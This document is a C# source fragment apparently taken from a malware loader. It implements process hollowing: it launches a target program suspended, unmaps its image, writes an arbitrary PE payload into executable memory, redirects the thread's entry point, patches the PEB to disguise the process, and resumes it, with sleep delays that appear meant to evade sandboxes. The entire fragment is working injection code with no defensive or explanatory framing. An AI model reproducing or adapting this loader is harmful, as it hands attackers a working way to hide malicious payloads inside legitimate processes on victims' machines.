private static extern bool CreateProcess(string applicationName, string commandLine, IntPtr processAttributes, IntPtr threadAttributes, bool inheritHandles, uint creationFlags, IntPtr environment, string currentDirectory, ref Loader.STARTUP_INFORMATION startupInfo, ref Loader.PROCESS_INFORMATION processInformation);
private static bool HandleRun(string path, string cmd, byte[] data, bool compatible)
{
int num = 0;
string text = string.Format("\"{0}\"", path);
Loader.STARTUP_INFORMATION targetProcessStartInfo = default(Loader.STARTUP_INFORMATION);
Loader.PROCESS_INFORMATION targetProcessInfo = default(Loader.PROCESS_INFORMATION);
targetProcessStartInfo.Size = Convert.ToUInt32(Marshal.SizeOf(typeof(Loader.STARTUP_INFORMATION)));
bool result;
try
{
if (!string.IsNullOrEmpty(cmd))
{
text = text + " " + cmd;
}
if (!Loader.CreateProcess(path, text, IntPtr.Zero, IntPtr.Zero, false, 4u, IntPtr.Zero, null, ref targetProcessStartInfo, ref targetProcessInfo))
{
throw new Exception();
}
int num2 = BitConverter.ToInt32(data, 60);
int num3 = BitConverter.ToInt32(data, num2 + 52);
int[] array = new int[179];
array[0] = 65538;
if (IntPtr.Size == 4)
{
// 32bit windows
if (!Loader.GetThreadContext(targetProcessInfo.ThreadHandle, array))
{
throw new Exception();
}
}
else
{
// windows 64 bit
if (!Loader.Wow64GetThreadContext(targetProcessInfo.ThreadHandle, array))
{
throw new Exception();
}
}
int num4 = array[41];
int num5 = 0;
if (!Loader.ReadProcessMemory(targetProcessInfo.ProcessHandle, num4 + 8, ref num5, 4, ref num))
{
throw new Exception();
}
if (num3 == num5)
{
if (Loader.NtUnmapViewOfSection(targetProcessInfo.ProcessHandle, num5) != 0)
{
throw new Exception();
}
}
Loader.Sleep(5000);
int length = BitConverter.ToInt32(data, num2 + 80);
int bufferSize = BitConverter.ToInt32(data, num2 + 84);
bool flag = false;
int num6 = Loader.VirtualAllocEx(targetProcessInfo.ProcessHandle, num3, length, 12288, 64);
if (!compatible && num6 == 0)
{
flag = true;
num6 = Loader.VirtualAllocEx(targetProcessInfo.ProcessHandle, 0, length, 12288, 64);
}
if (num6 == 0)
{
throw new Exception();
}
Loader.Sleep(5000);
if (!Loader.WriteProcessMemory(targetProcessInfo.ProcessHandle, num6, data, bufferSize, ref num))
{
throw new Exception();
}
int num7 = num2 + 248;
short num8 = BitConverter.ToInt16(data, num2 + 6);
for (int i = 0; i <= (int)(num8 - 1); i++)
{
int num9 = BitConverter.ToInt32(data, num7 + 12);
int num10 = BitConverter.ToInt32(data, num7 + 16);
int srcOffset = BitConverter.ToInt32(data, num7 + 20);
if (num10 != 0)
{
byte[] array2 = new byte[num10];
Buffer.BlockCopy(data, srcOffset, array2, 0, array2.Length);
if (!Loader.WriteProcessMemory(targetProcessInfo.ProcessHandle, num6 + num9, array2, array2.Length, ref num))
{
throw new Exception();
}
}
num7 += 40;
}
Loader.Sleep(10000);
byte[] bytes = BitConverter.GetBytes(num6);
if (!Loader.WriteProcessMemory(targetProcessInfo.ProcessHandle, num4 + 8, bytes, 4, ref num))
{
throw new Exception();
}
int num11 = BitConverter.ToInt32(data, num2 + 40);
if (flag)
{
num6 = num3;
}
array[44] = num6 + num11;
if (IntPtr.Size == 4)
{
if (!Loader.SetThreadContext(targetProcessInfo.ThreadHandle, array))
{
throw new Exception();
}
}
else
{
if (!Loader.Wow64SetThreadContext(targetProcessInfo.ThreadHandle, array))
{
throw new Exception();
}
}
Loader.Sleep(5000);
Loader.ReadProcessMemory(targetProcessInfo.ProcessHandle, 0x0, ref num5, 4, ref num);
if (IntPtr.Size == 4)
{
// 32bit windows
if (!Loader.GetThreadContext(targetProcessInfo.ThreadHandle, array))
{
throw new Exception();
}
}
else
{
// windows 64 bit
if (!Loader.Wow64GetThreadContext(targetProcessInfo.ThreadHandle, array))
{
throw new Exception();
}
}
Loader.Sleep(5000);
// Patch the PEB
PEB_Patch.Apply(targetProcessInfo.ThreadHandle, Assembly.GetEntryAssembly().Location);
Loader.Sleep(5000);
if (Loader.ResumeThread(targetProcessInfo.ThreadHandle) == -1)
{
throw new Exception();
}
}
catch (Exception ex)
{
Console.WriteLine(ex.ToString());
Process processById = Process.GetProcessById(Convert.ToInt32(targetProcessInfo.ProcessId));
if (processById != null)
{
processById.Kill();
}
result = false;
return(result);
}
result = true;
return(result);
}